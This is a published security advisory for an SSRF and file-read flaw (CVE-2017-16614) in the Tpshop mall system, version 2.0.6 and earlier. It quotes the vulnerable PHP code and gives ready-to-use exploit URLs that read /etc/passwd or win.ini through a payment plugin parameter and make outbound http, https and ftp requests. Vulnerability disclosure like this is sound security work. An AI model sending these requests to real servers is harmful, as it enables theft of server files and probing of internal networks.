Tpshop <= 2.0.6 Server Side Request Forgery Vulnerability

# SSRF（Server Side Request Forgery） in Tpshop <= 2.0.6 (CVE-2017-16614)

The Tpshop open source mall system is a  multi-merchant mode mall system developed by Shenzhen Leopard Network Co., 
Ltd.This system is based on the Thinkphp development framework. 

## Product Download: http://www.tp-shop.cn/Index/Index/download.html

## Vulnerability Type：SSRF（Server Side Request Forgery）

## Attack Type : Remote

## Vulnerability Description

Tpshop’s former version 2.0.6  is vulnerable to SSRF（Server Side Request Forgery） in the fBill parameter within the 
"/plugins/payment/weixin/lib/WxPay.tedatac.php?fBil=" path. This vulnerability can lead to arbitrary files reading, 
network port scanning，information detection, internal network server attack.

The vulnerability code:

    if($_GET['fBill'] && $_GET['WxPayDataBase'])
    {
        header('Content-type: image/jpeg');
        $handle = fopen($_GET['fBill'], 'r');
        fseek($handle , $_GET['WxPayDataBase']);
        fpassthru($handle);
    }


## Exploit

http://tpshop_path/plugins/payment/weixin/lib/WxPay.tedatac.php?fBill=file:///c:/windows/win.ini&WxPayDataBase=test

modify the above fBill parameter，example:

request http protocol: fBill=http://www.google.com

request https protocol: fBill=https://www.google.com

request ftp protocol: fBill=ftp://www.google.com

file read：fBil=file:///etc/passwd or fBil=file:///c:/windows/win.ini

## Versions

Tpshop <= 2.0.6

## Impact

SSRF(Server Side Request Forgery) in Tpshop before version 2.0.6 allow remote attackers to arbitrary files read，scan 
network port，information detection,internal network server attack.

## Credit

This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang &  National Computer Network Emergency Response 
Technical Team/Coordination Center of China (CNCERT/CC)

## References

CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16614

#  0day.today [2018-04-03]  #